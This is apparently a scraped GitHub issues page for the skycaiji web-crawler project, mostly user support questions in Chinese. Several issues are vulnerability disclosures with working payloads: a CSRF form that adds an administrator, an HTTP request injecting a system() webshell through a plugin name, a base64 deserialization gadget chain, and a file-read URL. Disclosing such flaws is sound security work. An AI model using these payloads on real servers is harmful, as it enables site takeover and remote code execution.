zorlan / skycaiji Goto Github PK
View Code? Open in Web Editor NEW蓝天采集器是一款开源免费的爬虫系统,仅需点选编辑规则即可采集数据,可运行在本地、虚拟主机或云服务器中,几乎能采集所有类型的网页,无缝对接各类CMS建站程序,免登录实时发布数据,全自动无需人工干预!是网页大数据采集软件中完全跨平台的云端爬虫系统
Home Page: https://www.skycaiji.com
License: Other
蓝天采集器是一款开源免费的爬虫系统,仅需点选编辑规则即可采集数据,可运行在本地、虚拟主机或云服务器中,几乎能采集所有类型的网页,无缝对接各类CMS建站程序,免登录实时发布数据,全自动无需人工干预!是网页大数据采集软件中完全跨平台的云端爬虫系统
Home Page: https://www.skycaiji.com
License: Other
描述:
在后台添加用户处,没有验证Referer和增加token,攻击者可构造表单进行CSRF攻击。
漏洞类型:
CSRF
攻击载体:
1.攻击者构造表单,a.com/csrf.html
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.197.25/skycaiji/index.php?m=admin&c=user&a=add" method="POST">
<input type="hidden" name="groupid" value="2" />
<input type="hidden" name="username" value="demo" />
<input type="hidden" name="password" value="demo123" />
<input type="hidden" name="repassword" value="demo123" />
<input type="hidden" name="email" value="admin@admin.com" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
2.网站管理员点击攻击者网站,a.com/csrf.com,即可添加管理员
攻击影响:
攻击者访问此页面即可添加网站管理员账号
zorlan,您好:
有两个问题请教:
1.请问我单独采集了url这样的数据,在发布时如何将url跟采集到的content合并在一起发布出去?
2.我在采集时将图片采集到了content中,但是我远程发布到别的vps的时候却没法发布过去,我是将图片和文本内容用|合并在采集到的content中的,可是发布时却只发布文本内容。(测试时能看到图片预览的)
Location: /SkycaijiApp/admin/controller/Develop.php#L707#funcAction()
Code:
...
else{
$module=input('module');
$copyright=input('copyright');
$identifier=input('identifier');
$name=input('name');
$methods=input('methods/a',array());
if(empty($module)){
$this->error('请选择类型');
}
$module=$mfuncApp->format_module($module);
$copyright=$mfuncApp->format_copyright($copyright);
$identifier=$mfuncApp->format_identifier($identifier);
if(!$mfuncApp->right_module($module)){
$this->error('类型错误');
}
if(!$mfuncApp->right_identifier($identifier)){
$this->error('功能标识只能由字母或数字组成,且首个字符必须是字母!');
}
if(!$mfuncApp->right_copyright($copyright)){
$this->error('作者版权只能由字母或数字组成,且首个字符必须是字母!');
}
$newMethods=array();
foreach ($methods['method'] as $k=>$v){
if(preg_match('/^[a-z\_]\w*/',$v)){
foreach ($methods as $mk=>$mv){
$newMethods[$mk][$k]=$mv[$k];
}
}
}
$methods=$newMethods;
unset($newMethods);
if(empty($methods['method'])){
$this->error('请添加方法!');
}
$app=$mfuncApp->app_name($copyright,$identifier);
$id=$mfuncApp->createApp($module,$app,array('name'=>$name,'methods'=>$methods));
if($id>0){
$this->success('创建成功','Develop/func?app='.$app);
}else{
$this->error('创建失败');
}
}
}
....
Vulnerability key code:
$app=$mfuncApp->app_name($copyright,$identifier);
$id=$mfuncApp->createApp($module,$app,array('name'=>$name,'methods'=>$methods));`
�
follow up $mfuncApp->app_name
Concatenate $copyright, $identifier directly, then return.
Go back to $id=$mfuncApp->createApp($module,$app,array('name'=>$name,'methods'=>$methods));
follow up $mfuncApp->createApp
$module,$app,array('name'=>$name,'methods'=>$methods)
And the parameters we can control,follow up
$funcFile=$this->filename($module,$app);
Return directly after splicing
Continue back to the createApp function
There is no filter /* and */ for variables $name
/plugin/func/$module/$copyright$identifier.php
Exp is constructed directly here:
POST /index.php?s=/Admin/Develop/func HTTP/1.1
Host: 172.16.49.3:50004
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 179
Origin: http://172.16.49.3:50004
Connection: close
Referer: http://172.16.49.3:50004/index.php?s=/admin/Develop/func
Cookie: PHPSESSID=o7c4tlckirjijmciq20ivi0cv4; login_history=3%7C6a03060e5e6600124dab098dfed314df
_usertoken_=94701bbd27956c7d922c079da883c68f&module=downloadImg&name=*/system($_POST[a]);/*&identifier=a11©right=b1&methods%5Bmethod%5D%5B%5D=a12&methods%5Bcomment%5D%5B%5D=11
安装chromium后 设置/usr/bin/chromium 提示
ERR: Display.cpp:993 (initialize): ANGLE Display::initialize error 12289: Could not open the default X display.
既然已经选择了开源 还弄乱代码格式是什么意思?不想让人看? IDE一键格式化的事.
因为有些网站需要登录,不知作者有没有增加计划
采集规则的单页抓取 能独立出解析api吗
初尝试,很给力。根据平时采集常用到的功能,希望增加下列功能:
下载了你的代码。用来学习一下。发现你的代码注释比较少。有一点比较尴尬的问题,为什么你的代码是压缩过的?不方便阅读。不太适合新手的入门和学习。我想把你的代码添加上注释。让更多的人容易看的懂。
RT
验证码反复对比过,没有错呀~
[ error ] [2]preg_match(): Compilation failed: missing closing parenthesis at offset 31
页面渲染失败:Connection to 'ws://127.0.0.1/devtools/page/' failed: Server sent invalid upgrade response: HTTP/1.1 500 Internal Server Error Content-Length:19 Content-Type:text/html 请检查[渲染设置]
求修复方法
采集器设置=>结果网址过滤:目前好像不支持多规则?
比如我要设置不能包含地址:/jobs/和/cous/ 这样的话没法设置了?
系统 macos,使用浏览器 safari和chrome均不可以正常加载验证码。
I found a deserialization vulnerability in v2.5.1
URL: http://localhost/index.php?s=/admin/mystore/upload
unserialize's parameter can control by uploading the file contains the payload.
/*skycaiji-plugin-start*/TzoyNzoidGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzIjoxOntzOjM0OiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGZpbGVzIjthOjE6e2k6MDtPOjE3OiJ0aGlua1xtb2RlbFxQaXZvdCI6NDp7czo2OiJwYXJlbnQiO086MjA6InRoaW5rXGNvbnNvbGVcT3V0cHV0IjoyOntzOjI4OiIAdGhpbmtcY29uc29sZVxPdXRwdXQAaGFuZGxlIjtPOjMwOiJ0aGlua1xzZXNzaW9uXGRyaXZlclxNZW1jYWNoZWQiOjE6e3M6MTA6IgAqAGhhbmRsZXIiO086MjM6InRoaW5rXGNhY2hlXGRyaXZlclxGaWxlIjoyOntzOjEwOiIAKgBvcHRpb25zIjthOjU6e3M6NjoiZXhwaXJlIjtpOjM2MDA7czoxMjoiY2FjaGVfc3ViZGlyIjtiOjA7czo2OiJwcmVmaXgiO3M6MDoiIjtzOjQ6InBhdGgiO3M6NzQ6InBocDovL2ZpbHRlci93cml0ZT1zdHJpbmcucm90MTMvcmVzb3VyY2U9PD9jdWMgQHJpbnkoJF9UUkdbX10pOz8+Ly4uL2EucGhwIjtzOjEzOiJkYXRhX2NvbXByZXNzIjtiOjA7fXM6NjoiACoAdGFnIjtzOjM6InlsZyI7fX1zOjk6IgAqAHN0eWxlcyI7YToxOntpOjA7czo3OiJnZXRBdHRyIjt9fXM6OToiACoAYXBwZW5kIjthOjE6e2k6MDtzOjg6ImdldEVycm9yIjt9czo3OiIAKgBkYXRhIjthOjE6e2k6MDtzOjM6IjEyMyI7fXM6ODoiACoAZXJyb3IiO086Mjc6InRoaW5rXG1vZGVsXHJlbGF0aW9uXEhhc09uZSI6Mzp7czoxNToiACoAc2VsZlJlbGF0aW9uIjtpOjA7czo4OiIAKgBxdWVyeSI7TzoxNDoidGhpbmtcZGJcUXVlcnkiOjE6e3M6ODoiACoAbW9kZWwiO086MjA6InRoaW5rXGNvbnNvbGVcT3V0cHV0IjoyOntzOjI4OiIAdGhpbmtcY29uc29sZVxPdXRwdXQAaGFuZGxlIjtyOjU7czo5OiIAKgBzdHlsZXMiO2E6MTp7aTowO3M6NzoiZ2V0QXR0ciI7fX19czoxMToiACoAYmluZEF0dHIiO2E6MTp7aTowO3M6MzoiMTIzIjt9fX19fQ==/*skycaiji-plugin-end*/
We will get a webshell
这是什么原因导致的?
链接数据库之后之前已经绑定了表-》数据库字段 更新了数据库字段 比如新增 了其他字段后无法查询到该字段
我找不到在哪里
挂服务器上有时候会因为大量采集被限制,本地的话一般没事,建议内置个微型webserver.
宝塔、phpstudy神马的不太合适
简单模式用那个分析网页功能,不加载js的脚本,有个提示“所见即所得,已过率所有脚本”,和这个有关系吗?
还是chrome启动需要加什么参数吗
有的时候需要实时爬取指定页面返回指定数据,若能添加API 方式和代理就很好了
获取内容 字段列表 的字段 建议加上一个获取内容是否为空的判断. 为空跳过.
采集的时候提示这样,然后不知道怎么弄了,有朋友遇到过同样的问题吗?
内容页图片可以下载,但是关联页的图片下载不了,只能获取远程地址!
采集amazon.com时,由于其默认的地址是**,文字显示是中文,在cookie缓存数据加入对应修改cookie后发现采集时抓取的源码还是中文的
I found an arbitrary file read vulnerability at V1.3
In the module of error log
URL: http://localhost/index.php?m=admin&c=Tool&a=log&file=D%3A%5CphpStudy%5CWWW%5CSkycaijiApp%5CRuntime%5CLogs%5CAdmin%5C18_09_13.log
The parameter of file can control,for example read index.php
POC:
suggest:limit the parameter of file
Info:V1.3
I hope you can fix it
Best wish!
author by:[email protected]
为什么我安装了php-curl,但是仍然显示curl不支持。php5.5,Ubuntu 14.04,重启apache、服务器都试过了。
请求官方考虑开发Joomla的本地和远程发布插件
渲染工具服务器未开启,请检查配置是否正确!确认无误后点击保存
可以更新一下 架构图以及设计思路吗,想深入学习一下🤞
[ 2020-03-25T00:04:47+08:00 ] 132.232.164.158 GET 域名/index.php?s=/Admin/Api/collect&backstage=1
[ error ] [8192]The each() function is deprecated. This message will be suppressed on further calls
[ error ] [2]getimagesize(域名/data/attachment/portal/201704/06/020952nkdg66cn1gfl16kd.jpg): failed to open stream: Connection timed out
[ error ] [2]getimagesize(域名/data/attachment/portal/201704/06/020935kmkghqccfjdkrjvv.jpg): failed to open stream: Connection timed out
[ error ] [2]getimagesize(域名/data/attachment/portal/201704/06/095225b7ly3cceehccfelf.jpeg): failed to open stream: Connection timed out
[ error ] [2]getimagesize(域名/data/attachment/portal/201704/06/104308tz4wci494tct2crw.jpg): failed to open stream: Connection timed out
[ error ] [2]getimagesize(域名/data/attachment/portal/201704/06/110353z3k53trt5nnk5nq3.png): failed to open stream: Connection timed out
[ error ] [2]getimagesize(http://域/data/attachment/portal/201704/06/114136g1nl9ll1ll611lh6.jpg.thumb.jpg): failed to open stream: Connection timed out
3x版本转换5x有点麻烦,公司项目全部是tp5所写
增加代理池:
目前的指定代理IP弹性有限。建议可指定代理池,邮代理池随机IP。
建议老大考虑升级TP5核心
https://github.com/jae-jae/QueryList
要是能集成这个查询器的话就更强大了
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.